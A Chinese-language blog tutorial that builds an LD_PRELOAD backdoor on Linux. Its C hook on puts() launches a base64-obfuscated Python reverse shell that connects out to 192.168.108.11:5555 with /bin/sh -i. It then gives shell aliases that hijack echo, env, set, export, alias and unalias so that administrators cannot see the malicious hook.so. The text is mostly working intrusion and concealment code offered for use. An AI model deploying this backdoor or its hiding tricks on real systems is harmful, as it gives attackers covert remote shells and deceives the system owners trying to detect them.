LD_PRELOAD 都快被写烂了,基本都是绕过 disable_functions ,之后分析得也比较完整,比较复杂
其实知识点也就是一个加载顺序的问题,之前咱们已经针对PATH的加载路径劫持做了介绍,这次原理没变,只不过是劫持函数,需要的知识点更高一些
动态链接库加载过程中会先加载 LD_PRELOAD 指向的变量,这样我们可以利用这个先加载来进行劫持正常的函数和命令
这次我们劫持 whoami
命令 ,查看一下 whoami 命令都调用了哪些库函数
可以看到这里有一个 whoami ,我们就劫持它,思路如下:
preload.c
#include <stdio.h>
#include <unistd.h>
#include <dlfcn.h>
#include <stdlib.h>
int puts(const char *message) {
int (*new_puts)(const char *message);
int result;
new_puts = dlsym(RTLD_NEXT, "puts");
system("python3 -c \"import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IG9zLHNvY2tldCxzdWJwcm9jZXNzOwpyZXQgPSBvcy5mb3JrKCkKaWYgcmV0ID4gMDoKICAgIGV4aXQoKQplbHNlOgogICAgdHJ5OgogICAgICAgIHMgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pCiAgICAgICAgcy5jb25uZWN0KCgiMTkyLjE2OC4xMDguMTEiLCA1NTU1KSkKICAgICAgICBvcy5kdXAyKHMuZmlsZW5vKCksIDApCiAgICAgICAgb3MuZHVwMihzLmZpbGVubygpLCAxKQogICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSwgMikKICAgICAgICBwID0gc3VicHJvY2Vzcy5jYWxsKFsiL2Jpbi9zaCIsICItaSJdKQogICAgZXhjZXB0IEV4Y2VwdGlvbiBhcyBlOgogICAgICAgIGV4aXQoKQ==')))\"");
result = new_puts(message);
return result;
}
这里的 payload 使用咱们 alias 后门文章中的 payload
编译
可以看到可执行文件 hook.so 已经完成了
设置 LD_PRELOAD
成功获取到反弹shell ,劫持成功。
加固后门
正常大家检查是否存在 LD_PRELOAD 后门的时候都是直接 echo $LD_PRELOAD
这样直接就可以看到我们修改的环境变量了,相信大家已经想到了,可以使用上一节 alias 后门的想法进行隐藏
在这之前,我们还是要先把查看环境变量的方式大概总结出来,这样呢,可以一次性隐匿一下:
我能想到的大概就上面五种,其中 cat /proc/$PID/environ
我们不进行劫持,因为比较复杂,不好把控,容易弄巧成拙
alias 技巧主要有以下几个步骤:
先来 echo
之前没有定义echo的别名,很好
alias echo='func(){ echo $* | sed "s!/home/helper/hook.so! !g";};func'
成功劫持!
咱们把劫持 unalias 和劫持 alias 放在最后,先把这些命令都劫持一下:
env
这个太简单了,直接 grep -v 就可以实现了
之前没有设置过env 的别名
alias env='func(){ env $* | grep -v "/home/helper/hook.so";};func'
成功劫持
set
很长,我们直接使用 grep 来进行筛选查询吧:
可以看到,完全是空的对吧,毕竟我们没有进行修改嘛,这里我为什么要 grep env 呢?一会揭晓...
set 命令返回的结果巨长,所以我是直接 grep 了一下
仔细看图里的东西,这都是我一不留神发现的,上一步我们设置的env 别名会出现在 set 中,但是吧,需要执行一次 env 后才会出现在 set 中
alias set='func(){ set $* | grep -v "/home/helper/hook.so";};func'
成功劫持
export
大家都熟悉了吧,咋写估计都快能背下来了
alias export='func(){ export $* | grep -v "/home/helper/hook.so";};func'
成功劫持显示,同时呢,因为之前劫持set 后,export这一条也不会在 set 中显示,啊,我真是个天才,哈哈哈
劫持 unalias
alias unalias='func(){ if [ $# != 0 ]; then if [ $* != "echo" ]&&[ $* != "env" ]&&[ $* != "set" ]&&[ $* != "export" ]&&[ $* != "alias" ]&&[ $* != "unalias" ]; then unalias $*;else echo "-bash: unalias: ${*}: not found";fi;else echo "unalias: usage: unalias [-a] name [name ...]";fi;};func'
劫持 alias
默认情况 alias 一下就露馅了对吧,所以我们劫持它
alias alias='func(){ alias "$@" | grep -v unalias | grep -v hook.so;};func'
劫持成功
现在我们来进行验证后门还好用吗
可以看到后门可以使用,那么现在我们来看一下以上各种方法还能否看见我们做的手脚
完美!
Tips:
如果不是我为了故意与别人的文章不一样,下面的问题我都不会发现
问了一圈人,也没人知道咋回事,到现在我也不知道具体因为什么,如果哪位兄弟知道,麻烦告知一下原因,求求了
参考文章
https://payloads.online/archivers/2020-01-01/1
https://www.elttam.com/blog/goahead/
https://www.exploit-db.com/papers/13233
https://attack.mitre.org/techniques/T1055/